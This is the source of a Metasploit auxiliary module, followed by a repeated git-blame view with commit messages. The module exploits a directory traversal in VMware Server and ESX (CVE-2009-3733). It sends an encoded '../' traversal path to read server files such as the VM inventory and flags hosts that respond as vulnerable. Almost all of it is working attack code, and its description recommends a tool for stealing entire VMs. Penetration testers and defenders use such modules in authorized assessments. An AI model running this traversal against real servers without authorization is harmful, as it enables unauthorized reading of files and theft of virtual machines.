metasploit-framework/modules/auxiliary/scanner/http/vmware_server_dir_trav.rb

##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'msf/core'

class Metasploit3 < Msf::Auxiliary

  # Exploit mixins should be called first
  include Msf::Exploit::Remote::HttpClient
  # Scanner mixin should be near last
  include Msf::Auxiliary::Scanner
  include Msf::Auxiliary::Report

  def initialize
    super(
      'Name'        => 'VMware Server Directory Traversal Vulnerability',
      'Description' => 'This modules exploits the VMware Server Directory Traversal
        vulnerability in VMware Server 1.x before 1.0.10 build 203137 and 2.x before
        2.0.2 build 203138 on Linux, VMware ESXi 3.5, and VMware ESX 3.0.3 and 3.5
        allows remote attackers to read arbitrary files. Common VMware server ports
        80/8222 and 443/8333 SSL.  If you want to download the entire VM, check out
        the gueststealer tool.',
      'Author'      => 'CG' ,
      'License'     => MSF_LICENSE,
      'References'	=>
        [
          [ 'URL', 'http://www.vmware.com/security/advisories/VMSA-2009-0015.html' ],
          [ 'OSVDB', '59440' ],
          [ 'BID', '36842' ],
          [ 'CVE', '2009-3733' ],
          [ 'URL', 'http://fyrmassociates.com/tools/gueststealer-v1.1.pl' ]
        ]
    )
    register_options(
      [
        Opt::RPORT(8222),
        OptString.new('FILE', [ true,  "The file to view", '/etc/vmware/hostd/vmInventory.xml']),
        OptString.new('TRAV', [ true,  "Traversal Depth", '/sdk/%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E']),
      ], self.class)
  end

  def run_host(target_host)

    begin
      file = datastore['FILE']
      trav = datastore['TRAV']
      res = send_request_raw({
        'uri'          => trav+file,
        'version'      => '1.1',
        'method'       => 'GET'
      }, 25)

      if res.nil?
        print_error("Connection timed out")
        return
      end

      if res.code == 200
        #print_status("Output Of Requested File:\n#{res.body}")
        print_status("#{target_host}:#{rport} appears vulnerable to VMWare Directory Traversal Vulnerability")
        report_vuln(
          {
            :host   => target_host,
            :port	=> rport,
            :proto  => 'tcp',
            :name	=> self.name,
            :info   => "Module #{self.fullname} reports directory traversal of #{target_host}:#{rport} with response code #{res.code}",
            :refs   => self.references,
            :exploited_at => Time.now.utc
          }
        )
      else
        vprint_status("Received #{res.code} for #{trav}#{file}")
      end

    rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout => e
      print_error(e.message)
    rescue ::Timeout::Error, ::Errno::EPIPE
    end
  end

end
fix whitespace and add keywords git-svn-id: file:///home/svn/framework3/trunk@8633 4d416f70-5f16-0410-b530-b9f4589650da 2010-02-25 00:13:56 +00:00			`##`
Fix up comment splats with the correct URI See the complaint on #4039. This doesn't fix that particular issue (it's somewhat unrelated), but does solve around a file parsing problem reported by @void-in 2014-10-17 16:47:33 +00:00			`# This module requires Metasploit: http://metasploit.com/download`
Redo the boilerplate / splat [SeeRM #8496] 2013-10-15 18:50:46 +00:00			`# Current source: https://github.com/rapid7/metasploit-framework`
vmware directory traversal module git-svn-id: file:///home/svn/framework3/trunk@8632 4d416f70-5f16-0410-b530-b9f4589650da 2010-02-24 23:58:51 +00:00			`##`

			`require 'msf/core'`

			`class Metasploit3 < Msf::Auxiliary`
fix whitespace and add keywords git-svn-id: file:///home/svn/framework3/trunk@8633 4d416f70-5f16-0410-b530-b9f4589650da 2010-02-25 00:13:56 +00:00
Retab modules 2013-08-30 21:28:54 +00:00			`# Exploit mixins should be called first`
			`include Msf::Exploit::Remote::HttpClient`
			`# Scanner mixin should be near last`
			`include Msf::Auxiliary::Scanner`
			`include Msf::Auxiliary::Report`
vmware directory traversal module git-svn-id: file:///home/svn/framework3/trunk@8632 4d416f70-5f16-0410-b530-b9f4589650da 2010-02-24 23:58:51 +00:00
Retab modules 2013-08-30 21:28:54 +00:00			`def initialize`
			`super(`
			`'Name' => 'VMware Server Directory Traversal Vulnerability',`
			`'Description' => 'This modules exploits the VMware Server Directory Traversal`
			`vulnerability in VMware Server 1.x before 1.0.10 build 203137 and 2.x before`
			`2.0.2 build 203138 on Linux, VMware ESXi 3.5, and VMware ESX 3.0.3 and 3.5`
			`allows remote attackers to read arbitrary files. Common VMware server ports`
			`80/8222 and 443/8333 SSL. If you want to download the entire VM, check out`
			`the gueststealer tool.',`
			`'Author' => 'CG' ,`
			`'License' => MSF_LICENSE,`
			`'References' =>`
			`[`
			`[ 'URL', 'http://www.vmware.com/security/advisories/VMSA-2009-0015.html' ],`
			`[ 'OSVDB', '59440' ],`
			`[ 'BID', '36842' ],`
			`[ 'CVE', '2009-3733' ],`
			`[ 'URL', 'http://fyrmassociates.com/tools/gueststealer-v1.1.pl' ]`
			`]`
			`)`
			`register_options(`
			`[`
			`Opt::RPORT(8222),`
			`OptString.new('FILE', [ true, "The file to view", '/etc/vmware/hostd/vmInventory.xml']),`
			`OptString.new('TRAV', [ true, "Traversal Depth", '/sdk/%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E']),`
			`], self.class)`
			`end`
vmware directory traversal module git-svn-id: file:///home/svn/framework3/trunk@8632 4d416f70-5f16-0410-b530-b9f4589650da 2010-02-24 23:58:51 +00:00
Retab modules 2013-08-30 21:28:54 +00:00			`def run_host(target_host)`
vmware directory traversal module git-svn-id: file:///home/svn/framework3/trunk@8632 4d416f70-5f16-0410-b530-b9f4589650da 2010-02-24 23:58:51 +00:00
Retab modules 2013-08-30 21:28:54 +00:00			`begin`
			`file = datastore['FILE']`
			`trav = datastore['TRAV']`
			`res = send_request_raw({`
			`'uri' => trav+file,`
			`'version' => '1.1',`
			`'method' => 'GET'`
			`}, 25)`
vmware directory traversal module git-svn-id: file:///home/svn/framework3/trunk@8632 4d416f70-5f16-0410-b530-b9f4589650da 2010-02-24 23:58:51 +00:00
Retab modules 2013-08-30 21:28:54 +00:00			`if res.nil?`
			`print_error("Connection timed out")`
			`return`
			`end`
Fix undefined method error [FixRM #8329] 2013-08-21 06:10:46 +00:00
Retab modules 2013-08-30 21:28:54 +00:00			`if res.code == 200`
			`#print_status("Output Of Requested File:\n#{res.body}")`
			`print_status("#{target_host}:#{rport} appears vulnerable to VMWare Directory Traversal Vulnerability")`
			`report_vuln(`
			`{`
			`:host => target_host,`
			`:port => rport,`
			`:proto => 'tcp',`
			`:name => self.name,`
			`:info => "Module #{self.fullname} reports directory traversal of #{target_host}:#{rport} with response code #{res.code}",`
			`:refs => self.references,`
			`:exploited_at => Time.now.utc`
			`}`
			`)`
			`else`
			`vprint_status("Received #{res.code} for #{trav}#{file}")`
			`end`
vmware directory traversal module git-svn-id: file:///home/svn/framework3/trunk@8632 4d416f70-5f16-0410-b530-b9f4589650da 2010-02-24 23:58:51 +00:00
Retab modules 2013-08-30 21:28:54 +00:00			`rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout => e`
			`print_error(e.message)`
			`rescue ::Timeout::Error, ::Errno::EPIPE`
			`end`
			`end`
vmware directory traversal module git-svn-id: file:///home/svn/framework3/trunk@8632 4d416f70-5f16-0410-b530-b9f4589650da 2010-02-24 23:58:51 +00:00
fix whitespace and add keywords git-svn-id: file:///home/svn/framework3/trunk@8633 4d416f70-5f16-0410-b530-b9f4589650da 2010-02-25 00:13:56 +00:00			`end`